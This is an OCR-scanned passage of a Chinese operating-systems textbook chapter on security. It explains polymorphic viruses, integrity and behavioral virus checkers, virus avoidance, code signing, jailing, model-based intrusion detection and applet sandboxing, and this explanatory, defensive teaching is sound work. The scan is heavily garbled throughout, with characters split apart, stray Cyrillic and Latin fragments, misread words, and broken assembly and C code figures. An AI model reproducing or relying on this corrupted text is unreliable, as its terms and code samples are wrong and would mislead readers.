的 代码 段 。 这 种 能 够 交换 机 器 码 指令 而 不 影响 程序 功能 的 代码 叫做 变异 引 伏 (mutation engine) 。 较 复杂 
的 病毒 在 复制 病毒 体 时 ， 可 以 通过 变异 引擎 产生 不 同 的 解密 代码 。 变异 的 手段 包括 插入 一 些 没 用 而 且 没 


е) 


394 #9 


有 危害 的 代码 ， 改 变 代码 的 顺序 ， 交 换 寄 存 器 ， 把 某 条 指令 用 它 的 等 价 指令 替换 。 变 异 引擎 本 身 与 病毒 
体 一 起 也 可 以 通过 加 密 的 方法 隐藏 起 来 。 


MOV ARI MOV ARI MOV A,R1 MOV AR1 MOV ARI 
ADD B,R1 NOP ADD #0,R1 OR RIRI TST RI 
ADO CR1 ADD B.R1 ADD B.R1 ADD BR1 ADD CR1 
SUB #4,R1 NOP OR RIRI МОУ R1,R5 MOV R1,R5 
MOV ятх ADD CR1 ADD CR1 ADD САТ ADD ВАТ 
NOP SHL #0.R1 SHL R1,0 СМР R2.R5 
SUB 4#4.R1 SUB #4.R1 SUB #4.R1 SUB #4,R1 
NOP JMP +1 ADD R5,R5 JMP +1 
MOV RIX MOVRIX MOV R1X моу R1X 
MOVRSY МОУ R5Y 


а) b) 9 d) ә 
图 9-33 多 形态 病毒 的 实例 


要 求 较 差 的 反 病 毒 软件 意识 到 图 9-33a 至 图 9-33e 具 有 相同 的 代码 功能 是 相当 困难 的 ， 特 别 是 当 变异 
引擎 有 能 力 “和 狭 免 三 宣 ” 时 。 反 病毒 软件 可 以 分 析 病毒 代码 ， 了 解 病毒 原理 ， 甚 至 可 以 试图 模拟 代码 操 
Е, 但 我 们 必须 记 住 有 成 千 上 万 的 病毒 和 成 千 上 万 的 文件 需要 分 析 , 所 以 每 次 测试 不 能 花费 太 多 的 时 间 ， 
否则 运行 起 来 会 惊人 地 慢 。 

另外 ， 储 存在 变量 ?里 的 值 是 为 了 让 人 们 难以 发 现 与 R5 有 关 的 代码 是 死 码 的 事实 ， 死 码 不 会 做 任何 
事情 。 如 果 其 他 代码 段 对 ?进行 了 读 写 ， 代 码 就 会 看 上 去 十 分 合法 。 一 个 写 得 十 分 好 的 变异 引擎 代码 会 
产生 极 强 的 变种 ， 会 给 反 病毒 软件 的 作者 带 来 榆 梦 般 的 麻烦 。 惟 一 让 人 安里 的 是 这 样 的 引擎 很 难 编写 ， 
所 以 Virgil 的 朋友 都 使 用 他 的 代码 ， 结 果 在 病毒 界 里 并 没有 种 类 繁多 的 变异 引擎 。 

到 目前 为 止 ， 我 们 讨论 的 是 如 何 识别 被 感染 的 可 执行 文件 里 的 病毒 。 而 且 ， 反 病毒 扫描 器 必须 检查 
MBR、 引 导 遍 区 、 坏 扇 区 列表 、 闪 速 ROM、CMOS 等 区 域 。 但 是 如 果 有 内 存 驻 留 病毒 在 运行 会 怎样 呢 ? 
该 内 存 驻 留 病毒 不 会 被 发 现 。 更 精 的 是 假设 运行 的 病毒 正在 控制 所 有 的 系统 调用 ， 它 就 能 轻易 地 探测 到 
反 病 毒 程序 正在 读 引导 扇 区 (用 以 查找 病毒 )。 为 了 阻止 反 病毒 程序 ， 病 毒 进行 系统 调用 ， 相 反 它 把 真正 
的 引导 区 从 坏 扁 区 列表 的 藏身 之 地 返回 。 它 也 可 以 作 记录 ， 在 被 扫描 器 检查 以 后 会 再 次 感染 所 有 的 文件 。 

为 了 防止 被 病毒 欺骗 ， 反 病毒 程序 也 可 以 会 跳 过 操作 系统 直接 去 读物 理 磁盘 。 不 过 这 样 做 需要 具有 
用 于 IDE、SCSI 和 其 他 种 类 硬盘 的 内 置 设备 驱动 程序 ， 这 样 会 降低 反 病毒 程序 的 可 移植 性 ， 过 到 不 通用 
的 硬盘 就 会 一 筹 莫 展 。 而 且 ， 跳 过 操作 系统 来 读 取 引 导 扇 区 是 可 以 的 ， 但 是 跳 过 操作 系统 来 读 取 所 有 的 
可 执行 文件 却 是 不 可 能 的 ， 所 以 仍然 存在 病毒 产生 出 与 可 执行 文件 相关 的 欺骗 性 数据 的 危险 。 

2. 完整 性 检查 程序 

另 一 种 完全 不 同 的 病毒 检测 方法 是 实施 完 束 性 检查 (integrity checking) 。 采 用 这 种 方法 的 反 病 毒 程 
序 首先 扫描 硬盘 上 的 病毒 ， 一 旦 确信 硬盘 是 干净 的 ， 它 就 开始 为 每 个 可 执行 文件 计算 一 个 校 验 和 。 计算 
校 验 和 的 算法 应 该 是 很 简单 的 ， 就 像 把 程序 段 中 的 所 有 字 作 为 32 位 或 者 64 位 整数 加 起 来 求 和 一 样 简单 ， 
但 是 这 种 算法 也 要 像 加 密 的 散 列 算法 一 样 ， 是 不 可 能 逆向 求解 的 。 然 后 ， 要 把 一 个 目录 中 的 所 有 相关 文 
件 的 校 验 和 写 到 一 个 文件 中 去 。 下 一 次 运行 的 时 候 ， 程 序 重新 计算 校 验 值 ， 看 是 否 与 校 验 和 文件 里 的 值 
相 匹 配 。 这 样 被 感染 的 文件 会 立刻 被 查 出 。 

问题 在 于 Virgil 并 不 愿意 让 病毒 被 查 出 ， 他 可 以 写 一 段 病毒 代码 把 校 验 和 文件 移 走 。 更 精 的 是 ， 他 
可 以 计算 已 感染 病毒 的 文件 校 验 值 ， 用 这 一 值 替代 校 输 和 文件 里 的 正常 值 。 为 了 保护 校 验 值 不 被 更 改 ， 
反 病毒 程序 可 以 尝试 把 该 文件 藏 起 来 ， 但 对 长 时 间 研究 反 病毒 程序 的 Virgil 来 说 ， 这 种 方法 也 难以 奏效 。 
比较 好 的 方法 是 对 文件 加 密 以 便 使 得 其 上 的 破坏 容易 被 发 现 。 理想 状态 是 加 密 采 用 了 智能 卡 技术 ， 加 密 
密 钥 被 放 在 芯片 里 使 得 程序 无 法 读 到 。 

3. 行为 检查 程序 

第 三 种 反 病毒 程序 使 用 的 方法 是 实施 行为 检查 (behavioral checking)。 通 过 这 种 方法 ， 反 病毒 程序 
在 系统 运行 时 驻 留 在 内 存 里 ， 并 自己 捕捉 所 有 的 系统 调用 。 这 -方法 能 够 监视 所 有 的 系统 活动 ， 并 试图 
捕捉 任何 可 能 被 怀疑 的 行为 。 例 如 ， 通 常 没有 程序 会 覆盖 引导 扇 区 ， 所 以 有 这 种 企图 的 程序 几乎 可 以 肯 
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定 是 病毒 。 同 理 ， 改 变 闪 速 ROM 的 内 容 也 值得 怀疑 。 
但 是 也 有 些 情况 比较 难以 判断 。 例 如 ， 覆 盖 可 执行 文件 是 一 个 特殊 的 操作 ， 除 非 是 编译 器 。 如 果 反 
病毒 程序 检测 到 了 这 样 一 个 写 的 动作 并 发 出 了 警告 ， 它 希望 用 户 能 根据 当时 情形 决定 是 否 要 覆盖 可 执行 


以 从 可 执行 文件 里 分 离 出 来 ， 并 使 用 特殊 的 系统 调用 驻 留 内 存 。 当 然 ， 这 也 可 能 是 合法 的 ， 但 是 给 出 警 
告 还 是 是 十 分 有 用 的 。 

病毒 并 不 会 被 动 地 等 着 反 病 毒 程序 杀 死 自己 ， 它 们 也 会 反击 。 一 场 特别 有 趣 的 战斗 会 发 生 在 内 存 驻 
留 病 毒 和 内 存 驻 留 反 病 毒 程序 之 间 。 多 年 以 前 ， 有 一 个 叫做 Core Wars 的 游戏 ， 在 游戏 里 两 个 程序 员 各 
自 放置 程序 到 空余 的 地 址 空间 里 。 程 序 依次 抢夺 内 存 ， 目 的 是 把 对 手 的 程序 清理 出 去 来 护 大 自己 的 地 盘 。 
病毒 与 反 病毒 程序 之 间 的 战斗 就 有 点 像 这 个 游戏 ， 而 战场 转换 到 了 那些 并 不 希望 战斗 发 生 的 受害 者 的 机 
器 里 。 更 精 的 是 ， 病 毒 有 一 个 优势 ， 它 可 以 去 买 反 病毒 软件 来 了 解 对 手 。 当 然 ， 一 旦 病毒 出 现 ， 反 病毒 
小 组 也 会 修改 软件 ， 从 而 逼迫 Virgil 不 得 不 再 买 新 的 版 本 。 

4 病毒 避免 

每 一 个 好 的 故事 都 需要 理念 。 这 里 的 理念 是 : 

与 其 遗 幅 不 如 尽量 安全 。 

避免 病毒 比 起 在 计算 机 感染 后 去 试图 追踪 它们 要 容易 得 多 。 下 面 是 -- 些 个 人 用 户 的 使 用 指南 ， 这 也 
是 整个 产业 界 为 减轻 病毒 问题 所 做 的 努力 。 

用 户 该 怎样 做 来 避免 病毒 感染 呢 ? 第 一 ， 选 择 能 提供 高 度 安全 保障 的 操作 系统 ， 这 样 的 系统 应 该 拥 
有 强大 的 核心 ~ 用 户 态 边界 ， 分 离 提供 每 个 用 户 和 系统 管理 员 的 登录 密码 。 在 这 些 条 件 下 ， ИЖ ЖЯ 
毒 无 法 感染 系统 代码 。 

第 二 ， 仅 安装 从 可 靠 的 供应 商 处 购买 的 最 小 配置 的 软件 。 有 时， 即使 这 样 也 不 能 保证 有 些 软 件 公司 
雇员 会 在 商业 软件 产品 里 放置 病毒 ， 但 这 样 做 会 有 较 大 的 帮助 。 从 Web 站 点 和 公告 板 下 载 软件 是 十 分 冒 
险 的 行为 。 

第 三 ， 购 买 性 能 良好 的 反 病 毒 软件 并 按 指定 要 求 使 用 。 确 保 能 够 经 常 从 商 站 点 下 载 更 新 版 本 。 

第 四 ， 不 要 点 击 电子 邮件 里 的 附件 ， 告 诉 他 人 不 要 发 送 附件 给 自己 。 使 用 简明 ASCII 文 本 的 邮件 比 
较 安 全 ， 而 附件 在 打开 时 可 能 会 启动 病毒 程序 。 

第 五 ， 定 期 将 重要 文件 备份 到 外 部 存储 介质 ， 如 软磁盘 、CD-R 或 磁带 等 。 在 -系列 的 备份 介质 中 
应 该 保存 不 同 的 版 本 。 这 样 ， 当 发 现 病毒 时 就 有 机 会 还 原 被 感染 前 的 文件 。 例 如 ， 假设 还 原 昨天 已 被 感 
染 的 备份 版 本 不 成 功 的 话 ， 还 原 上 一 周 的 版 本 也 许 会 有 用 。 

最 后 一 点 ， 抵 抗 住 诱惑 ， 不 要 从 一 个 不 了 解 的 地 方 下 载 并 运行 那些 吸引 人 的 新 免费 软件 。 或 许 这 些 
软件 免费 的 原因 是 : 它 的 制造 者 想 让 你 的 机 器 加 入 他 的 僵尸 机 器 的 大 军 中 来 。 然 而 ， 如 果 你 有 虚拟 机 软 
件 的 话 ， 在 虚拟 机 中 运行 这 些 不 了 解 的 软件 是 安全 的 。 

整个 业界 应 该 重视 病毒 并 改变 一 些 危险 的 做 法 。 第 一 ， 制 造 简单 的 操作 系统 。 铃声 和 口哨 声 越 多 ， 
安全 漏洞 也 越 多 ， 这 就 是 现实 。 

第 二 ， 不 要 使 用 动态 文本 。 从 安全 角度 来 说 ， 动 态 文本 是 可 怕 的 。 浏览 别人 提供 的 文档 时 最 好 不 要 
运行 别人 提供 的 程序 。 例 如 ，JPEG 文 件 就 不 包含 程序 ， 所 以 也 就 不 会 含有 病毒 。 所 有 的 文档 都 应 该 以 
这 样 的 方式 工作 。 

第 三 ， 应 该 采取 措施 将 重要 的 磁盘 柱 面 有 选择 性 地 写 保护 ， 防 止 病毒 感染 程序 。 这 种 方法 必须 在 控 
制 器 内 部 放置 位 图 说 明 ， 位 图 里 含有 受 保护 磁盘 柱 面 的 分 布 图 。 只 有 当 用 户 拨 动 了 计算 机 面板 上 的 机 械 
拨 动 开关 后 ， 位 图 才能 够 被 改动 。 

第 四 ， 使 用 闪存 是 个 好 主意 ， 但 只 有 用 户 拨 动 了 外 部 开关 后 才能 被 改动 ， 如 当 用户 有 意识 地 安装 
BIOS 升 级 程序 的 时 候 。 当 然 ， 所 有 这 些 措施 在 没有 遭受 病毒 的 强烈 攻击 时 ， 是 不 会 引起 重视 的 。 例 如 ， 
有 些 病毒 会 攻击 金融 领域 ， 把 所 有 银行 账户 的 金额 重 置 为 0。 当 然 ， 那 时 候 再 采取 措施 就 太 晚 了 。 


9.8.3 代码 签名 
一 种 完全 不 同 的 防止 恶意 软件 的 方法 (全面 防御 ) ， 是 我 们 只 运行 那些 来 自 可 靠 的 软件 厂商 的 没有 
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被 修改 过 的 软件 。 马 上 我 们 会 问 ， 用 户 如 何 知道 软件 的 确 是 来 自 它 自 己 所 声称 的 厂商 ， 并 且 用 户 又 如 何 
知道 软件 从 它 被 生产 之 后 没有 被 修改 过 呢 。 当 我 们 从 一 个 名 声 未 知 的 在 线 商店 中 下 载 软件 或 者 从 站 点 下 
载 ActiveX 控 件 的 时 候 ， 这 个 问题 就 显得 格外 重要 。 例 如 ， 如 果 ActiveX 控 件 来 自 一 个 著名 的 软件 公司 ， 
那么 它 几 乎 不 可 能 包含 一 个 木马 程序 ， 但 是 ， 用 户 如 何 确信 这 一 点 呢 ? 

一 种 被 广泛 应 用 的 解决 办 法 是 数字 签名 ， 这 部 分 内 容 在 9.2.4 节 中 已 经 讲解 过 。 如 果 用 户 只 运行 那些 
由 可 信 的 地 方 制造 并 签名 的 程序 、 插 件 、 驱 动 、ActiveX 控 件 以 及 其 他 软件 ， 那 么 陷入 麻烦 的 机 会 就 会 
少 得 多 。 但 是 这 样 做 导致 的 后 果 就 是 ， 那 些 来 自 于 Snarky Software 的 新 的 、 免 费 的 、 好 玩 的 、 花 哨 的 游 
戏 可 能 非常 不 错 但 是 不 会 通过 数字 签名 的 检查 ， 因 为 你 不 知道 谁 制造 了 他 们 。 

代码 签名 法 是 基于 公 钥 密码 体系 。 如 某 个 软件 厂商 产生 了 一 对 密 钥 ( 公 钥 和 私 钥 ) ， 将 公 钥 公 开 ， 
私 钥 妥善 保存 。 为 了 完成 对 一 个 软件 签名 ， 供 应 商 首先 将 代码 进行 散 列 函 数 运算 ， 得 到 128 位 (采用 
MD5 算 法 )、160 位 (采用 SHA-1 算 法 ) 或 256 位 (采用 SHA-256 算 法 ) 的 值 。 然 后 通过 私 钥 加 密 取 得 散 
列 值 的 数字 签名 (实际 上 ， 在 使 用 时 如 图 9-3 所 示 进 行 了 解密 )。 这 个 数字 签名 则 始终 伴随 着 这 个 软件 。 

当 用 户 得 到 这 个 软件 后 ， 计 算出 散 列 函数 并 保存 结果 ， 然 后 将 附带 的 数字 签名 用 公 钥 进 行 解密 。 接 
着 ， 核 对 解密 后 的 散 列 函数 值 同 自己 运算 出 的 值 是 否 相等 。 如 果 相等 ， 这 个 软件 就 被 接受 ， 否 则 就 作为 
伪造 版 本 被 拒绝 。 这 里 所 用 到 的 数学 方法 使 得 任何 想 要 段 改 软件 的 人 十 分 难以 得 手 ， 因 为 这 个 散 列 函 数 
要 同 从 真正 的 数字 签名 中 解密 出 来 的 散 列 函数 匹配 。 在 没有 私 钥 的 情况 下 通过 产生 匹配 的 假 数字 签名 是 
十 分 困难 的 。 签 名 和 校 验 的 过 程 如 图 9-34 所 示 。 

软件 供应 商 产生 签名 用 户 


Н = hash (Program) 
Signature = encrypt(H) 


验证 签名 
H1 = hash (Program) 
H2 = decrypt(Signature) 


如 果 HI = H2， 则 接受 程序 


图 9-34 代码 签名 的 工作 原理 


网 页 能 够 包含 代码 ， 比 如 AcitiveX 控 件 ， 以 及 各 种 脚本 语言 写 出 的 代码 。 通 常 这 些 代码 会 被 签名 ， 
而 浏览 器 会 自动 地 检查 这 些 签名 。 当 然 ， 为 了 验证 签名 ， 浏 览 器 需要 软件 厂商 的 公 钥 ， 它 们 通常 和 代码 
在 一 起 。 和 公 钥 一 起 的 还 有 被 菜 个 CA 签名 过 的 证 书 。 如 果 浏 览 器 已 经 保存 了 这 个 CA 的 公 钥 的 话 ， 它 可 
以 自己 验证 这 个 证 书 。 如 果 这 个 证 书 是 被 浏览 器 所 不 知道 的 菜 个 CA 签名 的 话 ， 那 么 它 会 弹出 一 个 对 话 
框 询问 是 否 接受 这 个 证 书 。 
984 囚禁 

一 个 古老 的 俄国 访 语 说 :“ 相 信 但 需要 验证 。” 很 明显 地 ， 古 代 的 俄国 人 在 头脑 中 就 已 经 清楚 地 有 了 
软件 的 概念 。 即 使 一 个 软件 已 经 被 签名 了 ， 一 个 好 的 态度 是 去 核实 它 是 否 都 能 正常 运行 。 做 这 件 事情 的 
一 种 技术 是 四 森 (jailing) ， 如 图 9-35 所 示 。 

如 图 9-35， 一 个 新 被 接受 的 程序 会 作为 一 个 标 
有 “囚犯 ”的 标签 的 进程 来 运行 。 这 个 “ 狱 卒 ” 是 
-个 可 信任 的 系统 的 ) 进程 ， 可 以 监管 办 犯 进程 


囚犯 


的 行为 。 当 一 个 被 监禁 的 进程 作出 一 个 系统 调用 的 系统 调用 
时 候 ， 系 统 调用 不 会 被 执行 ， 而 是 把 控制 移交 给 狼 
ЖИЙ! (通过 一 个 内 核 陷阱 ) 并 把 系统 调用 号 和 参 WB 


BERAE, ЕВ НТ ОХ ЕИ В т 
用 被 允许 。 例 如 ， 如 果 被 监禁 的 进程 试图 和 一 个 狱 йлы 
卒 进程 不 知道 的 远程 主机 建立 一 个 网 络 连接 ， 这 个 系统 调用 会 被 拒绝 然后 该 囚犯 进程 被 结束 。 如 果 这 个 
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系统 调用 是 可 以 接受 的 ， 那 么 狱 卒 进程 会 通知 内 核 ， 由 内 核 来 执行 该 系统 调用 。 通 过 使 用 这 种 方法 ， 不 
正确 的 行为 会 在 它 引 起 麻烦 之 前 被 捕捉 到 。 

囚禁 有 很 多 的 实现 方法 。 有 一 种 方法 可 以 在 不 需要 修改 内 核 的 情况 下 ， 在 几乎 任何 一 个 UNIX 系 统 
上 实现 ， 这 种 方法 是 Van't Noordende 等 人 在 2007 年 提出 的 。 在 nutshell 中 ， 这 个 方法 使 用 普通 的 UNIX 调 
试 功能 ， 让 狱 卒 进程 作为 调试 者 而 囚犯 进程 作为 被 调试 者 。 这 种 情况 下 ， 调 试 者 可 以 指示 内 核 把 被 调试 
者 封装 起 来 ， 然 后 把 被 调试 者 的 所 有 系统 调用 都 传递 给 自己 来 监视 。 


9.8.5 基于 模型 的 入 侵 检测 

还 有 一 种 方法 可 以 保护 我 们 的 机 器 ， 那 就 是 安装 一 个 IDS (Intrusion Detection System)。IDS 有 两 种 
基本 的 类 型 ， 一 种 关注 于 监测 进入 电脑 的 网 络 包 ， 另 一 种 关注 寻找 CPU 上 的 异常 情况 。 之 前 在 防火 墙 的 
部 分 我 们 简要 地 提 到 了 网 络 IDS， 现在 我 们 对 于 基于 主机 的 IDS 进 行 一 些 讲解 。 出 于 篇 幅 限 制 ， 我 们 不 
能 够 审视 全 部 的 种 类 繁多 的 基于 主机 的 IDS。 相 反 地 ， 我 们 选择 一 种 类 型 来 简单 地 了 解 它们 是 如 何 工作 
的 。 这 种 类 型 是 基于 静态 模型 的 入 侵 检 测 (wagner 和 Dean，2001)。 它 可 以 用 上 面 提 到 的 囚禁 技术 来 实 
Ж, 同时 也 有 其 他 的 实现 方法 。 

在 图 9-36a 中 我 们 看 到 了 这 样 一 个 小 程序 ， 它 打开 一 个 叫 data 的 文件 ， 然 后 每 次 一 个 字符 地 读 入 ， 直 
到 遇 到 了 一 个 0 字 节 ， 这 时 打印 出 文件 开始 部 分 的 非 0 字 节 的 个 数 然后 程序 退出 。 在 图 9-36b 中 ,我 们 看 
到 了 这 个 程序 的 系统 调用 图 (这 里 打印 被 叫做 write ) 。 


int main(int argc *char argvl]) (=) 
{ 
int fd, n = 0; 
char Ыш]; 
íd = ореп(“аіа", 0); С) © 
рпїї("Ваа data file\n"); 
exit(1); 
E сз (® 


а) b) 


图 9-36 а) 程序 ，b) 该 程序 的 系统 调用 


这 个 图 告诉 了 我 们 什么 呢 ? 首先 ， 在 任何 情况 下 ， 这 个 程序 的 第 一 个 系统 调用 一 定 是 open。 第 二 个 
系统 调用 是 read 或 者 write， 这 要 根据 执行 if 语 句 的 那个 分 支 来 决定 。 如 果 第 二 个 系统 调用 是 write， 那 么 
就 意味 着 文件 无 法 打开 ， 然 后 下 一 个 系统 调用 必须 是 exit。 如 果 第 二 个 系统 调用 是 read， 那 么 可 能 还 有 频 
外 任意 多 次 的 read 调 用 ， 并 且 最 后 调用 close、write 和 exit。 在 没有 入 侵 的 情况 下 ， 其 他 序列 是 不 可 能 的 。 
如 果 这 个 程序 被 囚禁 ， 那 么 狱 卒 程序 可 以 看 到 所 有 的 系统 调用 并 很 容易 地 验证 某 个 序列 是 不 是 有 效 的 。 

现在 假设 某 人 发 现 了 这 个 程序 的 一 个 bug， 然 后 成 功 地 引起 了 缓冲 区 溢出 ， 插 入 并 执行 了 恶意 代码 。 
当 恶 意 代码 运行 的 时 候 ， 极 大 的 可 能 是 会 执行 一 个 不 同 的 系统 调用 序列 。 例 如 ， 恶 意 代码 可 能 尝试 打开 
某 个 它 想 要 复制 的 文件 或 者 可 能 和 家 里 的 电话 建立 网 络 连 接 。 当 第 一 次 出 现 系统 调用 不 符合 原来 的 模式 
时 ， 狱 卒 十 分 肯定 地 认定 出 现 了 攻击 并 会 采取 行动 ， 比 如 结束 这 个 进程 并 向 系统 管理 员 报警 。 这 样 ， 入 
侵 检测 系统 就 能 够 在 攻击 发 生 的 时 候 检查 到 它们 。 静 态 系统 调用 分 析 只 是 很 多 IDS 工 作 方法 中 的 一 种 。 

当 使 用 这 种 基于 静态 模型 的 人 侵 检测 的 时 候 ， 狼 卒 必须 知道 这 个 模型 (比如 系统 调用 图 )。 最 直接 
的 方式 就 是 让 编译 器 产生 它 并 让 程序 的 作者 签名 同时 附 上 它 的 证 书 。 这 样 的 话 ， 任 何 预先 修改 可 执行 程 
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序 的 企图 都 会 被 在 程序 运行 的 时 候 检测 到 ， 因 为 实际 的 行为 和 被 签 过 名 的 预期 行为 不 一 致 

很 不 幸 的 是 ， 一 个 聪明 的 攻击 者 可 能 发 动 一 种 叫做 模仿 攻击 (mimicry attack) 的 攻击 ， 在 这 种 攻 
击 中 插入 的 代码 会 有 和 该 程序 同样 的 系统 调用 序列 (Wagner 和 Soto，2002) ， 所 以 我 们 需要 更 复杂 的 模 
型 ， 不 能 仅仅 依靠 跟踪 系统 调用 。 然 而 ， 作 为 深层 防御 的 一 部 分 ，IDS 还 是 扮演 着 重要 的 角色 。 

无 论 如 何 ， 基 于 模型 的 IDS 不 仅仅 是 以 一 种 。 许 多 IDS 利 用 了 一 个 叫做 灾 准 (honeypot) 的 概念 ， 这 
是 一 个 吸引 和 捕捉 攻击 者 和 恶意 软件 的 陷阱 。 通 常 蜜 镰 会 是 一 个 孤立 的 机 器 ， 几 乎 没有 防御 ， 表 面 看 起 
来 令 人 感 兴趣 并 且 有 些 有 价值 的 内 容 ， 像 一 个 成 熟 等 待 采摘 的 果实 一 样 。 设 置 密 镶 的 人 会 小 心 屡 慷 地 监 
视 它 上 面 的 任何 攻击 并 尽量 去 了 解 攻 击 的 特征 。 一 些 IDS 会 把 守 镀 放 在 虚拟 机 上 防止 对 下 晨 实际 系统 的 
破坏 。 所 以 很 自然 地 ， 恶 意 软件 也 会 像 之 前 提 到 的 努力 地 检查 自己 是 否 运行 在 一 个 虚拟 机 上 。 


9.86 封装 移动 代码 

病毒 和 蠕虫 不 需要 制造 者 有 多 大 学 问 ， 而 且 往 往 会 与 用 户 意 愿 相反 地 侵入 到 计算 机 中 。 但 有 时 人 们 
也 会 不 经 意 地 在 自己 的 机 器 上 放 入 并 执行 外 来 代码 。 情 况 通常 是 这 样 发 生 的 : 在 蜗 远 的 过 去 (在 Internet 
世界 里 ， 代 表 去 年 )， 大 多 数 网 页 是 含有 少量 相关 图 片 的 静态 文件 ， 而 现在 越 来 越 多 的 网 页 包含 了 叫做 
Applet 的 小 程序 。 当 人 们 下 载 包含 Applet 的 网 页 时 ，Applet 就 会 被 调用 并 运行 。 例 如 ， 某 个 Applet 也 许 包 
含 了 需要 填充 的 表格 以 及 交互 式 的 帮助 信息 。 当 表格 填 好 后 会 被 送 到 网 上 的 某 处 进行 处 理 。 税 单 、 客 户 
产品 定单 以 及 许多 种 类 的 表格 都 可 以 使 用 这 种 方法 。 

另 一 个 让 程序 从 一 台 计算 机 到 另 一 台 计算 机 上 运行 的 例子 是 代理 程序 (agent) 。 代 理 程序 指 用 户 让 
程序 在 目标 计算 机 上 执行 任务 后 再 返回 报告 。 例 如 ， 要 求 某 个 代理 程序 查看 旅游 网 站 ， 查 找 从 阿 姆 斯 特 
六 到 旧金山 的 最 便宜 航线 。 代 理 程序 会 登录 到 每 个 站 点 上 运行 ， 找 到 所 需 的 信息 后 ， 再 前 进 到 下 一 个 站 
点 。 当 所 有 的 站 点 查询 完毕 后 ， 它 返回 原 处 并 报告 结果 。 

第 三 个 移动 代码 的 例子 是 PostScript 文 件 中 的 移动 代码 ， 这 个 文件 将 在 PostScript 打 印 机 上 打印 出 来 。 
t 文 件 实际 上 是 用 PostScript 语 言 编写 ， 它 可 在 打印 机 里 执行 的 程序 。 它 通常 告诉 打印 机 如 
何 画 某 些 特定 的 曲线 并 加 以 填充 ， 它 也 可 以 做 其 他 任何 想 做 的 事 。Applet、 代 理 和 PostScript 是 移动 代码 
(mobile code) 的 三 个 例子 ， 当 然 还 有 许多 其 他 的 例子 。 

在 前 面 大 篇 幅 讨论 了 病毒 和 蠕虫 之 后 ， 我 们 很 清楚 地 意识 到 让 外 来 代码 运行 在 自己 的 计算 机 上 多 少 
有 点 冒险 。 然 而 ， 有 些 人 的 确 想 要 运行 外 来 代码 ， 所 以 就 会 产生 问题 :“ 移 动 代码 可 以 安全 运行 吗 ? " 
mime 可 以 ， 但 并 不 容易 。 最 基本 的 问题 在 于 当 进 程 把 Applet 或 其 他 的 移动 代码 插入 地 址 空间 并 运 
行 后 ， 这 些 代码 就 成 了 合法 的 用 户 进程 的 一 部 分 ， 并 且 掌 握 了 用 户 所 拥有 的 权限 ， 包 括 对 用 户 的 磁盘 文 
件 进行 读 、 写 、 删 除 或 加 密 ， 把 数据 用 E-mail 发 送 到 其 他 国家 等 。 

很 久 以 前 ， 操 作 系 统 推出 了 进程 的 概念 ， 为 的 是 在 用 户 之 间 建 立 隔离 墙 。 在 这 一 概念 中 ， 每 个 进程 
都 有 自己 的 保护 地 址 空间 和 UID ， 人 允许 获取 自己 的 文件 和 资源 ， 而 不 能 获取 他 人 的 。 而 对 于 保护 进程 的 
一 部 分 ( 指 Applet) 或 者 其 他 资源 来 说 ， 进 程 概念 也 无 能 为 力 。 线 程 允许 在 一 个 进程 中 控制 多 个 线程 ， 
但 是 单个 线程 与 其 他 线程 之 间 却 没有 提供 保护 。 

从 理论 上 来 说 ， 将 每 个 Applet 作 为 独立 的 进程 运行 只 能 帮 上 一 点 忙 ， 但 缺乏 可 操作 性 。 例 如， 某 个 
Web 网 页 包含 了 相互 之 间 互 相 影响 的 两 个 或 多 个 Applet， 而 数据 在 Web 页 里 。Web 浏 览 器 也 需要 与 Applet 
交互 ， 启 动 或 停止 它们 ， 为 它们 输入 数 据 等 。 如 果 每 个 Applet 被 放 在 自己 的 进程 里 ， 就 无 法 进行 任何 操 
作 。 而 且 ， 把 每 个 Applet 放 在 自己 的 地 址 空间 里 并 不 能 保证 Applet 不 窃取 或 损害 数据 。 如 果 有 Applet 想 
这 样 做 是 很 容易 的 ， 因 为 没有 人 在 一 旁 监视 。 

人 们 还 使 用 了 许多 新 方法 来 对 付 Applet (通常 是 移动 代码 ) 。 下 面 我 们 将 看 看 其 中 的 两 种 方法 ; 沙 
愈 法 和 解释 法 。 另 外 ， 代 码 签名 同样 能 够 用 于 验证 Applet 代 码 。 每 一 种 方法 都 有 自己 的 长 处 和 短处 。 

1. 沙 金 法 

第 一 种 方法 叫做 沙 金 法 (sandboxing) ， 这 种 方法 将 每 个 运行 的 Applet 限 制 在 一 定 范围 的 有 效 地 址 中 
(Wahbe 等 人 , 1993)。 它 的 工作 原理 是 把 虚拟 地 址 空间 划分 为 相同 大 小 的 区 域 ， 每 个 区 域 叫做 沙 僵 。 每 
个 沙 鳃 必须 保证 所 有 的 地 址 共享 高 位 字 节 。 对 32 位 的 地 址 来 说 ， 我 们 可 以 把 它 划分 为 256 个 沙 盒 ， 每 个 
沙 使 有 16MB 空 间 并 共享 相同 的 高 8 位 。 同 样 ， 我 们 也 可 以 划分 为 512 个 8MB 空 间 的 沙 盒 ， 每 个 沙 盒 共 享 9 
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位 地 址 前 组 。 沙 盒 的 尺寸 可 以 选取 到 足够 容纳 最 大 的 Applet 而 不 浪费 太 多 的 地 址 空间 。 如 果 页 面 调用 满 
足 的 话 ， 物 理 内 存 不 会 成 为 问题 。 每 个 Applet 拥 有 两 个 沙 盒 ， 一 个 放置 代码 ， 另 一 个 放置 数据 ， 如 图 


9-37a 所 示 的 16 个 16MB 的 沙 盒 。 虚拟 地 址 
沙 使 的 用 意 在 于 保证 每 个 Applet 不 能 跳 转 到 或 引用 其 。 (单位 MB) 
他 的 代码 沙 盒 或 数据 沙 盒 。 提 供 两 个 沙 盒 的 目的 是 为 了 避 256[ 一 -一 
免 Applet 在 运行 时 超越 限制 修改 代码 。 通 过 抑制 把 所 有 的 ла 。 检查 系统 的 。 Mov Ri 1 
Я 访问 监视 器 БНА #24, S1 
Applet 放 入 代码 沙 盒 ， 我 们 减少 了 自我 修改 代码 的 危险 。 oan Н 
只 要 Applet 通 过 这 种 方法 受到 限制 ， 它 就 不 能 损害 浏览 器 ЕД TRAPNE 
或 其 他 的 Applet， 也 不 能 在 内 存 里 培植 病毒 或 者 对 内 存 千 
成 损失 。 
只 要 Applet 被 装 入 ， 它 就 被 重新 分 配 到 沙 盒 的 开头 ， Шктзев И И 
然后 系统 检查 代码 和 数据 的 引用 是 否 已 被 限制 在 相应 的 沙 ЕРИ еж 
盒 里 。 在 下 面 的 讨论 中 ， 我 们 将 看 一 下 代码 引用 (WIMP ас лы, 
和 CALL 指 令 )， 数 据 引 用 也 是 如 此 。 使 用 直接 寻 址 的 静态 ° 程序 


JMP 指 令 很 容易 检查 : 目标 地 址 是 否 仍旧 在 代码 沙 盒 里 ? а) b) 
